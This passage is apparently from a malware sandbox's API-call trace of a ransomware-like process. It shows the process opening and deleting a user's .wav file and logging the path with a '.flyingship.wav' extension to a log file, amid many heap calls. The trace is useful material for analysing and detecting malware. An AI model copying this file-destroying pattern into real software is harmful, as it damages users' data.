ftLastWriteTime.dwHighDateTime=0x1d5dc39, nFileSizeHigh=0x0, nFileSizeLow=0x18df5, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="tCz4fpeQ.wav", cAlternateFileName="")) returned 0x90af58 [0187.976] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0187.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0187.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0187.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0187.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0187.977] CharLowerBuffW (in: lpsz="byte[101877]", cchLength=0xc | out: lpsz="byte[101877]") returned 0xc [0187.977] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0187.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0187.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.977] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0187.977] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0187.978] FreeLibrary (hLibModule=0x75c90000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0187.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0187.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0187.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0187.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0187.979] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0187.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0187.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.979] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0187.979] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.979] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\tcz4fpeq.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0187.981] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0187.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0187.982] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0187.983] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.983] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.983] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.983] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0187.983] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.983] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.984] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.984] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav", lpFilePart=0x0) returned 0x42 [0187.984] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5c7070, ftCreationTime.dwHighDateTime=0x1d5d84f, ftLastAccessTime.dwLowDateTime=0x3e6d8870, ftLastAccessTime.dwHighDateTime=0x1d5dc39, ftLastWriteTime.dwLowDateTime=0x15454cc0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x18df5, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="tCz4fpeQ.wav", cAlternateFileName="")) returned 0x90af58 [0187.984] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\tcz4fpeq.wav")) returned 1 [0187.986] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5c7070, ftCreationTime.dwHighDateTime=0x1d5d84f, ftLastAccessTime.dwLowDateTime=0x3e6d8870, ftLastAccessTime.dwHighDateTime=0x1d5dc39, ftLastWriteTime.dwLowDateTime=0x15454cc0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x18df5, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="tCz4fpeQ.wav", cAlternateFileName="")) returned 0 [0187.986] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0187.987] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.987] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0187.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0187.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0187.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0187.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0187.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0187.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0187.988] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0187.988] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0187.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0187.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0187.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.988] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0187.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.988] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0187.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0187.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0187.988] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0187.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0187.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0187.989] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0187.989] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0187.989] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.989] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0187.989] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.989] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0187.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0187.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0187.989] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0187.989] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x293d, lpOverlapped=0x0) returned 1 [0187.990] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0187.990] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x293d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.990] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0187.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0187.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0187.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0187.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0187.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.flyingship.wav\r\n", cchWideChar=80, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0187.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0187.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.flyingship.wav\r\n", cchWideChar=80, lpMultiByteStr=0x9238c0, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.flyingship.wav\r\n", lpUsedDefaultChar=0x0) returned 80 [0187.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0187.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0187.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0187.990] WriteFile (in: hFile=0x158, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x4f, lpOverlapped=0x0) returned 1 [0187.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0187.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0187.990] CloseHandle (hObject=0x158) returned 1 [0187.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0187.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0187.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0187.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0187.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0187.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0187.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0187.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0187.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0187.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0187.992] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0187.992] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0187.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0187.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, 